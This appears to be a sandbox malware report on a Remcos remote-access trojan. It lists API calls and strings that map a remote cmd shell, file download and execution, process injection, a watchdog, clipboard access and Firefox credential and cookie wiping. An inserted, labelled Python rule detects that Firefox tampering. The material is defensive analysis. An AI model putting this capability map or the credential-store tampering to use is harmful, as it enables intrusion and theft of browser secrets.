                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID:
                                • API String ID: 3677997916-0
                                • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                • Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
                                • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                • Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                control_flow_graph 723 40165e-401664 724 401666-401668 723->724 725 401669-401674 723->725 726 401676 725->726 727 40167b-401685 725->727 726->727 728 401687-40168d 727->728 729 4016a8-4016a9 call 4344ea 727->729 728->729 730 40168f-401694 728->730 733 4016ae-4016af 729->733 730->726 732 401696-4016a6 call 4344ea 730->732 735 4016b1-4016b3 732->735 733->735
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                                • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                control_flow_graph 737 446137-446143 738 446175-446180 call 4405dd 737->738 739 446145-446147 737->739 746 446182-446184 738->746 741 446160-446171 RtlAllocateHeap 739->741 742 446149-44614a 739->742 743 446173 741->743 744 44614c-446153 call 445545 741->744 742->741 743->746 744->738 749 446155-44615e call 442f80 744->749 749->738 749->741
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                                • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SetEvent.KERNEL32(?,?), ref: 00407CB9
                                • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                                • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                  • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                                  • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                                  • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                                  • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                                  • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
                                • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                                • DeleteFileA.KERNEL32(?), ref: 00408652
                                  • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                  • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                  • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                  • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                • Sleep.KERNEL32(000007D0), ref: 004086F8
                                • StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A
                                  • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                • API String ID: 1067849700-181434739
                                • Opcode ID: 3b7c4b3d7d449749017bc82f18da2b12a0677a5740b025592c3c036ee554d5ba
                                • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                                • Opcode Fuzzy Hash: 3b7c4b3d7d449749017bc82f18da2b12a0677a5740b025592c3c036ee554d5ba
                                • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __Init_thread_footer.LIBCMT ref: 004056E6
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                • __Init_thread_footer.LIBCMT ref: 00405723
                                • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                                • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                • CloseHandle.KERNEL32 ref: 00405A23
                                • CloseHandle.KERNEL32 ref: 00405A2B
                                • CloseHandle.KERNEL32 ref: 00405A3D
                                • CloseHandle.KERNEL32 ref: 00405A45
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                • API String ID: 2994406822-18413064
                                • Opcode ID: 46143a75dd4028347809439aaf74d6998f30d4825ee64e2d46a22c89c3e5df59
                                • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                • Opcode Fuzzy Hash: 46143a75dd4028347809439aaf74d6998f30d4825ee64e2d46a22c89c3e5df59
                                • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetCurrentProcessId.KERNEL32 ref: 00412106
                                  • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                  • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                  • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                                • CloseHandle.KERNEL32(00000000), ref: 00412155
                                • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$Mw
                                • API String ID: 3018269243-4030915158
                                • Opcode ID: 973e0795bb2218eb5ec7fcc829698362b3ece89b6ba2b2eacf6a1e6e7bb25139
                                • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                • Opcode Fuzzy Hash: 973e0795bb2218eb5ec7fcc829698362b3ece89b6ba2b2eacf6a1e6e7bb25139
                                • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,(x,?,00475338), ref: 0040F48E
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                • String ID: (x$C:\Program Files(x86)\Internet Explorer\$Inj$hdF$hdF$ieinstal.exe$ielowutil.exe$Mw
                                • API String ID: 3756808967-3187772608
                                • Opcode ID: 7f89ee10989f3bd4abeff3972d4c872612047b4c43f3230c1fb09e73b354777b
                                • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                • Opcode Fuzzy Hash: 7f89ee10989f3bd4abeff3972d4c872612047b4c43f3230c1fb09e73b354777b
                                • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                                • FindClose.KERNEL32(00000000), ref: 0040BBC9
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                                • FindClose.KERNEL32(00000000), ref: 0040BD12
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$CloseFile$FirstNext
                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                • API String ID: 1164774033-3681987949
                                • Opcode ID: e60ef44db30208dd2162595bb00c9bb932e2c9896fc53afd5e517d704f3508ac
                                • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                                • Opcode Fuzzy Hash: e60ef44db30208dd2162595bb00c9bb932e2c9896fc53afd5e517d704f3508ac
                                • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenClipboard.USER32 ref: 004168C2
                                • EmptyClipboard.USER32 ref: 004168D0
                                • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                • GlobalLock.KERNEL32(00000000), ref: 004168F9
                                • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                                • CloseClipboard.USER32 ref: 00416955
                                • OpenClipboard.USER32 ref: 0041695C
                                • GetClipboardData.USER32(0000000D), ref: 0041696C
                                • GlobalLock.KERNEL32(00000000), ref: 00416975
                                • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                • CloseClipboard.USER32 ref: 00416984
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                • String ID: !D@$hdF
                                • API String ID: 3520204547-3475379602
                                • Opcode ID: 7bdf44ed23baddef4cf62a28d7db66ec7c3cdf26bf7aa0f36eb4a81407acbbaf
                                • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                • Opcode Fuzzy Hash: 7bdf44ed23baddef4cf62a28d7db66ec7c3cdf26bf7aa0f36eb4a81407acbbaf
                                • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                                • FindClose.KERNEL32(00000000), ref: 0040BDC9
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                                • FindClose.KERNEL32(00000000), ref: 0040BEAF
                                • FindClose.KERNEL32(00000000), ref: 0040BED0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$Close$File$FirstNext
                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                • API String ID: 3527384056-432212279
                                • Opcode ID: 5d0565dfd04f48ee80346224fd960d4021310761f6a296d7b61b1ca4d4d71a86
                                • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                                • Opcode Fuzzy Hash: 5d0565dfd04f48ee80346224fd960d4021310761f6a296d7b61b1ca4d4d71a86
                                • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                                Uniqueness

                                Uniqueness Score: -1.00%
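The two Firefox records above walk \AppData\Roaming\Mozilla\Firefox\Profiles\ with FindFirstFileA/FindNextFileA and report logins.json, key3.db and cookies.sqlite as cleared rather than read. The detection below is an added example, not code from the report or from the sample: over constructed Sysmon-style file-delete events it flags any non-Firefox image deleting one of those stores inside a profile directory, and groups the hits per image so the "wipe the whole profile" pattern stands out. The event shape, the rmclient.exe image path and key4.db (the newer Firefox key store, not named in the report) are assumptions of the example.

```python
"""Flag deletion of Firefox credential and cookie stores by non-Firefox processes."""
import ntpath
import re
from typing import Dict, Iterable, List

# Files the two Firefox routines above look for (from their String IDs).
# key4.db is the newer key store; it is the editor's addition, not in the report.
FIREFOX_SECRET_STORES = {"logins.json", "key3.db", "key4.db", "cookies.sqlite"}
PROFILE_DIR_RE = re.compile(
    r"\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\[^\\]+\\", re.IGNORECASE)
TRUSTED_IMAGES = {"firefox.exe"}   # the browser itself rewrites these files
DELETE_EVENT_IDS = {23, 26}        # Sysmon FileDelete / FileDeleteDetected

# Constructed Sysmon-style events, reduced to the fields the rule needs.
PROFILE = r"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\abcd1234.default-release"
RAT = r"C:\Users\alice\AppData\Roaming\rmclient.exe"   # assumed dropped-binary path
SAMPLE_EVENTS = [
    {"EventID": 23, "Image": RAT, "TargetFilename": PROFILE + r"\logins.json"},
    {"EventID": 23, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "TargetFilename": PROFILE + r"\cookies.sqlite"},                    # benign
    {"EventID": 26, "Image": RAT, "TargetFilename": PROFILE + r"\cookies.sqlite"},
    {"EventID": 23, "Image": RAT, "TargetFilename": r"C:\Users\alice\Documents\notes.txt"},
    {"EventID": 11, "Image": RAT, "TargetFilename": PROFILE + r"\logins.json"},  # FileCreate
]


def is_firefox_secret_store(path: str) -> bool:
    """True for a credential/cookie store that sits inside a Firefox profile directory."""
    return bool(PROFILE_DIR_RE.search(path)) and \
        ntpath.basename(path).lower() in FIREFOX_SECRET_STORES


def detect(events: Iterable[Dict]) -> List[Dict[str, str]]:
    """One alert per delete event on a Firefox secret store by an untrusted image."""
    alerts = []
    for ev in events:
        if ev.get("EventID") not in DELETE_EVENT_IDS:
            continue
        target = ev.get("TargetFilename", "")
        if not is_firefox_secret_store(target):
            continue
        image = ntpath.basename(ev.get("Image", "")).lower()
        if image in TRUSTED_IMAGES:
            continue
        alerts.append({"image": image, "store": ntpath.basename(target).lower(),
                       "path": target})
    return alerts


def summarize(alerts: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """image -> sorted distinct stores it deleted. Two or more stores from one
    image is the profile-wipe behaviour of the routines above."""
    out: Dict[str, set] = {}
    for a in alerts:
        out.setdefault(a["image"], set()).add(a["store"])
    return {k: sorted(v) for k, v in out.items()}


if __name__ == "__main__":
    for image, stores in summarize(detect(SAMPLE_EVENTS)).items():
        print(f"{image} deleted Firefox stores: {', '.join(stores)}")
```

The profile-directory check matters: a logins.json dropped directly under Profiles\ (outside any profile) is not a credential store, and the trusted-image exemption should stay narrow, since the routines above run inside whatever process the RAT occupies, not inside firefox.exe.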

                                APIs
                                • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                • CloseHandle.KERNEL32(?), ref: 00413465
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                • String ID:
                                • API String ID: 297527592-0
                                • Opcode ID: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
                                • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                • Opcode Fuzzy Hash: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
                                • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0$1$2$3$4$5$6$7$VG
                                • API String ID: 0-1861860590
                                • Opcode ID: 41b7ed3079968531247989beadbe1f0bf299f88a528c0936b597c9f8fef39dcf
                                • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                • Opcode Fuzzy Hash: 41b7ed3079968531247989beadbe1f0bf299f88a528c0936b597c9f8fef39dcf
                                • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _wcslen.LIBCMT ref: 00407521
                                • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Object_wcslen
